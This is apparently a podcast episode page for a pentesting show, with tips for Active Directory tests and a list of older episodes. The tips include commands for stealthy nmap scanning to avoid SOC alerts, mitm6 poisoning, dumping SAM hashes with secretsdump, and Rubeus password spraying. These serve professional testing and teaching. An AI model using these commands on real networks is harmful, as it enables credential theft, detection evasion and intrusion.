7MS #514: Tales of Pentest Pwnage - Part 34
7 Minute Security30 Mars 2022

7MS #514: Tales of Pentest Pwnage - Part 34

Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:

  • I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile

  • Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd

  • Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error!

  • Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!

  • LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it

Avsnitt(719)

7MS #47: Logging and Alerting RELOADED (audio)

7MS #47: Logging and Alerting RELOADED (audio)

Hey, you should log the stuff going on in your network. This episode talks about that (again). And I reference some AD-related settings that may not be enabled in your environment…stuff you might want...

17 Mars 20157min

7MS #46: So You Want to be a Hacker? (audio)

7MS #46: So You Want to be a Hacker? (audio)

So you want to be a hacker? Cool. In this episode I toss myself under the bus and share why I used to have a really dumb perspective on what that meant, and how my view of hackers – and hacking – has ...

14 Mars 20157min

7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

Warning, this is an off topic episode! I used to pirate software. There. I admitted it. But it's funny how a letter from the Comcast legal dept. will change your mind and let you see piracy in a whole...

10 Mars 20157min

7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

Warning, this is an off topic episode! Did you know it's fun to stay at the YMCA? Did you also know it's fun to annoy annoying people at the YMCA? Listen to this episode to find out why. 7MS #44: OFFT...

7 Mars 20157min

7MS #43: Why Web Site Vulnerability Scanners Can Ruin Your Day (audio)

7MS #43: Why Web Site Vulnerability Scanners Can Ruin Your Day (audio)

Did you know that Web site vulnerability scanners can destroy your customer sites? If not, listen to this. 7MS #43: Why Web Site Vulnerability Scanners Can Ruin Your Day (audio)

28 Feb 20157min

7MS #42: Vulnerability Scans vs. Pentests (audio)

7MS #42: Vulnerability Scans vs. Pentests (audio)

I think everybody throws around the terms "vulnerability scans" and "pentests" and they mean completely different things from one person to the next. In this episode I try to clarify the differences a...

14 Feb 20157min

7MS #41: OSCP – Part 7 (audio)

7MS #41: OSCP – Part 7 (audio)

Tried of talking about OSCP yet? Me neither! 7MS #41: OSCP – Part 7 (audio)

6 Feb 20156min

7MS #40: OSCP – Part 6 (audio)

7MS #40: OSCP – Part 6 (audio)

PART SIX of a mind-bending series all about OSCP! 7MS #40: OSCP – Part 6 (audio)

31 Jan 20157min

Populärt inom Politik & nyheter

aftonbladet-krim
svenska-fall
rss-krimstad
p3-krim
spar
aftonbladet-daily
flashback-forever
rss-sanning-konsekvens
politiken
rss-krimreportrarna
motiv
blenda-2
rss-flodet
rss-frandfors-horna
grans
rss-vad-fan-hande
rss-aftonbladet-krim
dagens-eko
svd-ledarredaktionen
olyckan-inifran